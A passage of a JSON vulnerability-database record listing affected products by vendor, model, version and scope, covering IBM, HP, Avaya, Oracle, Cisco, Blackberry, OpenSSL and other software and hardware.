"ibm", "version": "9.1.2.00" }, { "model": "tivoli asset discovery for distributed", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.2.0" }, { "model": "rational requirements composer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.7" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.2" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3.1" }, { "model": "jre update", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.5.039" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.43" }, { "model": "linux sparc", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "aura experience portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "notes fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.35" }, { "model": "license metric tool", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.2" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v37007.2" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.1" }, { "model": "project openssl 1.0.1k", "scope": "ne", "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "jre update", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.8.06" }, { "model": "rational requirements composer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.04" }, { "model": "sterling connect:direct browser user interface ifix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.0.208" }, { "model": "jre update22", "scope": "eq", "trust": 0.3, "vendor": "sun", "version": "1.5.0.220" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v50001.1" }, { "model": "rational business developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.15" }, { "model": "chassis management module 2pet12g", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "java sdk ga", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8" }, { "model": "tivoli common reporting", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1.1.2" }, { "model": "cognos business intelligence server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2.1" }, { "model": "ip office application server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "8.0" }, { "model": "rational requirements composer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.3" }, { "model": "project openssl 1.0.1i", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.12" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1" }, { "model": "initiate master data service", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "8.1" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.6" }, { "model": "sterling connect:express for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4.6" }, { "model": "system management homepage c", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.10.186" }, { "model": "db2 workgroup server edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.5" }, { "model": "adaptive security appliance software", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "8.4(7.26)" }, { "model": "real-time compression appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.8.0.10" }, { "model": "jdk update", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.6.043" }, { "model": "tivoli network performance manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.1" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.2" }, { "model": "communications session border controller scz7.3.0", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "domino fp if", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0.121" }, { "model": "cognos business intelligence server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v35007.3" }, { "model": "os", "scope": "ne", "trust": 0.3, "vendor": "blackberry", "version": "1010.3.1.1779" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.1" }, { "model": "virtual connect enterprise manager sdk", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.4" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.35" }, { "model": "jre update3", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.7.0" }, { "model": "cognos tm1 interim fix", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "10.1.1.2" }, { "model": "project openssl 0.9.8y", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "dataquant", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1.3" }, { "model": "tivoli storage manager for virtual environments", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0.0" }, { "model": "tivoli application dependency discovery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.0.8" }, { "model": "jboss enterprise application platform", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6.3" }, { "model": "wireless lan controller", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "message networking", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.0" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.39" }, { "model": "splunk", "scope": "eq", "trust": 0.3, "vendor": "splunk", "version": "5.0.11" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "3.0.68" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v35007.4" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.4" }, { "model": "flashsystem 9848-ac2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v90000" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.1" }, { "model": "sterling connect:direct browser ifix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4.11.03" }, { "model": "work space manager for bes10/bes12 23584 14", "scope": null, "trust": 0.3, "vendor": "blackberry", "version": null }, { "model": "jdk update26", "scope": "eq", "trust": 0.3, "vendor": "sun", "version": "1.6.0.260" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.2.1.830" }, { "model": "nextscale nx360 m4 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "54550" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.14" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.22" }, { "model": "tivoli network performance manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4" }, { "model": "tandberg codian isdn gw", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "32200" }, { "model": "link for mac os (build", "scope": "eq", "trust": 0.3, "vendor": "blackberry", "version": "1.1.139)" }, { "model": "websphere dashboard framework", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.1" }, { "model": "linux ia-64", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "initiate master data service", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "9.2" }, { "model": "rational team concert", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0.1" }, { "model": "tivoli common reporting", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1.0.2" }, { "model": "jdk 1.5.0 11", "scope": null, "trust": 0.3, "vendor": "sun", "version": null }, { "model": "smartcloud entry fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2.08" }, { "model": "rational engineering lifecycle manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0.1" }, { "model": "jabber video for telepresence", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "proventia network enterprise scanner", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.3" }, { "model": "norman shark network protection", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "5.2" }, { "model": "rational developer for i", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0.1" }, { "model": "jdk update", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.5.036" }, { "model": "rational functional tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.1.1" }, { "model": "chassis management module 2pet10e", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3.3" }, { "model": "workcentre 3025ni", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "3.50.01.10" }, { "model": "sterling control center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.7" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.0.0-95" }, { "model": "buildforge", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.2" }, { "model": "splunk", "scope": "eq", "trust": 0.3, "vendor": "splunk", "version": "6.0.6" }, { "model": "tivoli workload scheduler distributed fp05", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1" }, { "model": "tivoli workload scheduler distributed fp01", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.0" }, { "model": "flashcopy manager for unix and linux", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1.0.0" }, { "model": "rational doors web access", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.51" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.1" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v50007.5" }, { "model": "jdk", "scope": "eq", "trust": 0.3, "vendor": "sun", "version": "1.5.0.180" }, { "model": "security privileged identity manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.1.1" }, { "model": "system type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x3690x571480" }, { "model": "rational business developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.16" }, { "model": "websphere mq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.17" }, { "model": "java sdk sr16-fp9", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0" }, { "model": "thinpro linux", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "(x86)4.1" }, { "model": "splunk", "scope": "eq", "trust": 0.3, "vendor": "splunk", "version": "6.1.5" }, { "model": "norman shark network protection", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "5.3" }, { "model": "chassis management module 2pet10p", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "jdk 1.5.0.0 06", "scope": null, "trust": 0.3, "vendor": "sun", "version": null }, { "model": "splunk", "scope": "eq", "trust": 0.3, "vendor": "splunk", "version": "5.0" }, { "model": "rational business developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.1" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v50007.2" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5.3" }, { "model": "rational collaborative lifecycle management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0.7" }, { "model": "sterling control center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.0.1" }, { "model": "aura presence services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.2" }, { "model": "rational automation framework", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.1.2" }, { "model": "chassis management module 2peo12r", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "initiate master data service", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "tivoli storage manager for virtual environments", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.3.2.3" }, { "model": "control center ifix01", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.0.0.0" }, { "model": "system m4 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x375087220" }, { "model": "rational requirements composer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.1.3" }, { "model": "java sdk 6r1 sr8-fp2", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "pureapplication system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0" }, { "model": "netezza platform software 7.1.0.4-p1", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "cloud manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1.0.1" }, { "model": "rational doors web access", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.6.1" }, { "model": "project openssl 1.0.1f", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1.0.3" }, { "model": "bes12", "scope": "eq", "trust": 0.3, "vendor": "blackberry", "version": "12.0.1" }, { "model": "tivoli storage manager client management services", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.200" }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "32253.50.01.10" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.4.1" }, { "model": "rational reporting for development intelligence", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0.5" }, { "model": "java sdk sr16", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0" }, { "model": "multi-enterprise integration gateway", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0" }, { "model": "upward integration modules for microsoft system center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0.1" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2" }, { "model": "bbm meetings for blackberry", "scope": "eq", "trust": 0.3, "vendor": "blackberry", "version": "100" }, { "model": "rational team concert", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.7" }, { "model": "bcaaa", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "5.5" }, { "model": "tivoli application dependency discovery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.0.5" }, { "model": "java sdk sr16-fp10", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "5.0" }, { "model": "tivoli access manager for e-business", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "wag310g residential gateway", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.4" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.0-14" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.2" }, { "model": "linux amd64", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.8" }, { "model": "rational developer for aix and linux", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0.1" }, { "model": "sterling control center ifix02", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.4.10" }, { "model": "flashcopy manager for oracle", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1.0.0" }, { "model": "datapower gateway", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.5" }, { "model": "datapower gateway", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.0.1.7" }, { "model": "tivoli storage manager operations center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "project openssl 1.0.0o", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "tivoli workload scheduler for applications fp02", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.4" }, { "model": "rational software architect", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.1" }, { "model": "link for windows", "scope": "eq", "trust": 0.3, "vendor": "blackberry", "version": "1.2.1.31" }, { "model": "system management homepage b", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.5.146" }, { "model": "agent desktop", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "10.0(2)" }, { "model": "maximo asset management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.13" }, { "model": "rational team concert", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.3" }, { "model": "hp-ux b.11.31 (11i", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "v3)" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.0" }, { "model": "messaging application server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.0.1" }, { "model": "chassis management module 2pet12r", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "chassis management module 2pet10b", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "idp", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "0" }, { "model": "java sdk sr7", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7" }, { "model": "chassis management module 2peo12o", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "ctpos 7.0r4", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "jdk update", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.6.038" }, { "model": "unified attendant console department edition", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "rational engineering lifecycle manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.6" }, { "model": "system management homepage a", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.11.197" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.15210" }, { "model": "rational engineering lifecycle manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.5" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.0.0" }, { "model": "buildforge", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.3.3" }, { "model": "business process manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.1" }, { "model": "smartcloud entry fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.31" }, { "model": "rational application developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.3" }, { "model": "domino fp if", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.365" }, { "model": "junos space", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "0" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.1" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.3" }, { "model": "java sdk sr16-fp6", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0" }, { "model": "system management homepage 7.4.0a", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "smartcloud entry fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2.0.411" }, { "model": "java sdk sr12", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6" }, { "model": "java sdk", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6" }, { "model": "telepresence server on multiparty media", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "3204.1" }, { "model": "image construction and composition tool", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.3" }, { "model": "video surveillance series ip cameras", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "60000" }, { "model": "tape subsystems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.3" }, { "model": "jdk update", "scope": "eq", "trust": 0.3, "vendor": "sun", "version": "1.6.018" }, { "model": "system idataplex dx360 m2 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x73210" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3.2" }, { "model": "jdk update", "scope": "eq", "trust": 0.3, "vendor": "sun", "version": "1.6.019" }, { "model": "rational business developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.15" }, { "model": "enterprise manager ops center", "scope": "ne", "trust": 0.3, "vendor": "oracle", "version": "12.3" }, { "model": "rational functional tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.2.11" }, { "model": "project openssl 0.9.8zd", "scope": "ne", "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "rational collaborative lifecycle management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.1.2" }, { "model": "business process manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.51" }, { "model": "sterling connect:direct browser", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4.3" }, { "model": "rational developer for i", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.01" }, { "model": "flashsystem 9846-ae2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v90000" }, { "model": "cognos planning", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1.1" }, { "model": "systems insight manager sp2", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5.2" }, { "model": "iq", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.1.1" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v35007.2.0.5" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v35006.1" }, { "model": "secure work space for bes10/bes12", "scope": "eq", "trust": 0.3, "vendor": "blackberry", "version": "12.1.0.150361" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.0.1" }, { "model": "rational engineering lifecycle manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0" }, { "model": "notes fp1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0.1" }, { "model": "flashcopy manager for vmware", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1.1.1" }, { "model": "os", "scope": "eq", "trust": 0.3, "vendor": "blackberry", "version": "7.0" }, { "model": "commoncryptolib", "scope": "eq", "trust": 0.3, "vendor": "sap", "version": "0" }, { "model": "business process manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.0" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.3.9.3" }, { "model": "jdk 1.5.0 11-b03", "scope": null, "trust": 0.3, "vendor": "sun", "version": null }, { "model": "bes10", "scope": "eq", "trust": 0.3, "vendor": "blackberry", "version": "0" }, { "model": "smartcloud entry appliance fp", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1.0.4" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.5.3" }, { "model": "db2 connect unlimited advanced edition for system z", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.5" }, { "model": "enterprise", "scope": "eq", "trust": 0.3, "vendor": "splunk", "version": "5.0" }, { "model": "vgw", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "0" }, { "model": "flashcopy manager for db2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1.0.0" }, { "model": "rational collaborative lifecycle management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.1.1" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.2.2.835" }, { "model": "flashcopy manager for db2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1.1.2" }, { "model": "tivoli storage manager for virtual environments", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.0" }, { "model": "tivoli workload scheduler distributed", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1" }, { "model": "upward integration modules hardware management pack", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "5.5.3" }, { "model": "websphere mq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.0.4" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.7" }, { "model": "websphere mq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.1.3" }, { "model": "system m4 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x325025830" }, { "model": "jdk update2", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.7.0" }, { "model": "ns oncommand core package", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.2" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.3" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.2" }, { "model": "systems insight manager sp3", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5.0" }, { "model": "cloud manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1.0.3" }, { "model": "domino fix pack if", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0.133" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.2.1.830" }, { "model": "system management homepage 7.3.2.1", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "phaser", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "30203.50.01.10" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.32" }, { "model": "endeca server", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "7.5.1.1" }, { "model": "project openssl 1.0.0c", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "rational doors web access", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5" }, { "model": "bbm protected on ios", "scope": "eq", "trust": 0.3, "vendor": "blackberry", "version": "2.1" }, { "model": "rational business developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.13" }, { "model": "rational team concert", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.1.3" }, { "model": "video surveillance media server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "7.7" }, { "model": "smartcloud entry fp", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.110" }, { "model": "rational build utility", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "telepresence mcu", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "84200" }, { "model": "cms r16.3 r7", "scope": null, "trust": 0.3, "vendor": "avaya", "version": null }, { "model": "storwize", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "v70007.3.0.12" }, { "model": "system m2 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x365079470" }, { "model": "db2 connect enterprise edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.5" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.16" }, { "model": "infosphere information analyzer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "11.3" }, { "model": "rational developer for aix and linux", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.01" }, { "model": "jdk update", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.6.032" }, { "model": "rational collaborative lifecycle management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.4" }, { "model": "tivoli workload scheduler distributed", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "websphere service registry and repository", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1" }, { "model": "as infinity", "scope": "eq", "trust": 0.3, "vendor": "pexip", "version": "2" }, { "model": "business process manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.5.0" }, { "model": "os", "scope": "eq", "trust": 0.3, "vendor": "blackberry", "version": "5.0" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.9.790" }, { "model": "tivoli netcool configuration manager", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "6.4.1.3" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.12" }, { "model": "system m4 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x363071580" }, { "model": "ctpos 7.1r1", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "mq appliance m2000", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "api management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0" }, { "model": "jre update2", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.7.0" }, { "model": "content analysis system", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "1.1" }, { "model": "aura 